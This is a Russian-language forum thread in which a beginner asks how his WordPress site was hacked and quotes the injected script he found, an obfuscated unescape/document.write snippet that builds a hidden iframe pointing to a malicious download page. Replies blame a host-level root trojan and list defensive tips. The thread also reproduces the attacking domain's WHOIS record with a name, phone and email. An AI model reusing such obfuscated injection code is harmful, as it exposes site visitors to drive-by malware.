Я начинающий в Веб , и для учебы мне посоветовали создать партнерский сайт и его уже "мучить" :).
Вообщем суть не в том. Пару дней назад ,для пробы, я открыл сайт playfast.net.ru . Сегодня захожу на сайт и вижу что в браузере открываются формы для загрузки какихто pdf файлов , понимаю что сайт взломали со старта 😀 . После копания в коде обнаружил что ктото приписал в конец файла index.php этот скрипт :
</div><script>document.write(unescape('%3C')+unescape('%69')+unescape('%66%72')
+unescape('%61%6D')+unescape('%65%20%73%72')+unescape('%63%3D%22')
+unescape('%68')+unescape('%74')+unescape('%74')+unescape('%70')
+unescape('%3A%2F%2F%6F')+unescape('%79%34%62')
+unescape('%2D%6F%79')+unescape('%6B%62%2E')+unescape('%72%75%2F%75')
+unescape('%70')+unescape('%2E')+unescape('%68%74%6D')+unescape('%6C')
+unescape('%22')+unescape('%20%77')+unescape('%69%64')+unescape('%74')+unescape('%68')
+unescape('%3D%22%30%22')+unescape('%20')+unescape('%68%65%69')
+unescape('%67%68%74%3D')+unescape('%22')+unescape('%30')+unescape('%22')
+unescape('%20%66%72%61')+unescape('%6D%65%62%6F')+unescape('%72')+unescape('%64')
+unescape('%65%72%3D')+unescape('%22%30')+unescape('%22%3E%3C')+unescape('%2F')
+unescape('%69%66%72')+unescape('%61%6D%65%3E')+'');</script>
после расшифровки кода получил эту ссылку (хттп://oy4b-oykb.ru/up.html ) при заходе по которой предлагается скачать некие файлы. Потом пробил домен через рипн :
domain: OY4B-OYKB.RU type: CORPORATE nserver: ns1.exthost.biz. nserver: ns2.exthost.biz. state: REGISTERED, DELEGATED person: Miroslav J Babenko phone: +7 495 4563768 fax-no: +7 495 4563768 e-mail: 77@id.ru registrar: NAUNET-REG-RIPN created: 2008.06.18 paid-till: 2009.06.18 source: TC-RIPN
Самое интересное что по логам вход на сайт был только с моих ip чмод на index.php был 644, сейчас изменил на 444 , пароль к аккаунту на хостинге довольно длинный 😀 "если так можно выразится " его подобрать нереально.
Вообщем вопрос – что это за атака? Как защитится от подобного в будущем ? И что делать с атакующим , обращатся ли к его хостеру, или оставить все как есть изза бессмысленности моих действий в данном направлении?
P.S. Еще раз повторю , по логам , в админку на сайт , и к хостеру никто кроме меня не заходил. Соответственно ,я так понимаю, была использована какаято дыра в WordPress 2.6.5. Интересно какая?
дыра не в ВП265 а на хостинге скорее всего. в поиск по форуму!
Еще раз повторю 🙂 Трояны, которые воруют у мегоодминов пароли от ftp, в админку не ходят, они ходят через ftp. Следовательно, надо смотреть логи ftp, коих обычно хостеры не ведут, а если и ведут, то хорошо прячут. Хакеры, взламывающие хостера, тем более в админку не ходят.
Спасибо за ответы. Вы правы вломали хостера , троян под рутом так подшутил и над другими соседскими сайтами тоже. Я просто по незнанию дела думал что ломают только конкретные сайты , а оказывается еще и хостеров 🙂 . Поэтому извеняюсь но WordPress тут не причем. Кстати так как троян работал под рутом поэтому его нет и в логах и от таких атак ксожалению чмод файла практически бесполезен.
Против лома нет приёма. Защититься – никак. Максимум – это узнать, какие файлы менялись, используя плагин http://mywordpress.ru/plugins/belavir/ И то, если злоумышленник в курсе, что этот плагин стоит и как он работает, вражина сможет и его "испортить".
Почти похожая история. 17 ноября при заходе на сайт вместо главной стояла заставка с логотипом Google и просьбой подождать. Тоже взлом хостера, на всех поддоменах – та же история (притом стоят разные CMS). В WP были модифицированы почти все основные файлы темы. Взлом проводился с www.abb192.cn, IP – 82.192.0.0, регистрация – Нидерланды.
Хостер ответил, что их не ломали и посоветовал:
– запретить доступ по ftp всем IP, кроме своих;
– менять пароли доступа в админку Cpanel и соответственно ftp (рекомендуют раз в неделю);
– рекомендовал менять и пароли доступа в админку CMS и проверить возможное их хранение в файлах компьютера;
– при обнаружении попыток взлома ( при возможности определить IP ) – немедленно блокировать по IP;
– установить защиту папок.
Все восстановил за день ( домен и 3 поддомена), реализовал рекомендации, пока спокойно.